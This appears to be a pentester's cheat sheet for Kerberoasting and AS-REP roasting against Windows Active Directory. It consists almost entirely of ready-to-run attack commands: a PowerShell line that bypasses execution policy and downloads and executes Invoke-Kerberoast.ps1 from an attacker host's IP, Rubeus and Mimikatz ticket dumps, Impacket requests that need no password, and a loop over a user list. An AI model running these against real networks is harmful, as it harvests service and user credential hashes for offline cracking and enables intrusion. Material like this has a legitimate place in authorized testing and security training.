Roasting

Kerberoasting

https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/

From Windows Shell

PowerShell One-Liner

• Downloads Invoke-Kerberoast.ps1 from Kali, executes it, and saves output to file for hashcat reversing

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.121/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

Rubeus

Get-NetUser -SPN | select cn

Request-SPNTicket

Rubeus.exe kerberoast /format:hashcat > Hash1

Mimikatz

kerberos::ask /target:SPN
kerberos::list /export

• No pass or admin required:

kerberos::list
kerberos::list /export

From Kali

No Passwords, Known-Good Users

GetUserSPNs.py $DOMAIN/ -nopass -usersfile users.txt

With Full Creds

GetUserSPNs.py -request -dc-ip $target $domain/username:password

More Kerberos in-depth:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

https://www.youtube.com/watch?v=beRDcvBwTBw

AS-Rep Roasting

• More rare than kerberoasting because something has to be set manually, namely the ‘no preauth required’ has to be unchecked on the account, meaning it doesn't need to use kerberos to request

GetNPUsers.py -dc-ip $target domain.com/username:password

• or without any password!

GetNPUsers.py -no-pass domain.com/username

• Or from a list

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $IP domain.local/$user | grep krb5asrep; done

• If you've added to hosts file you won't need the IP written explicitly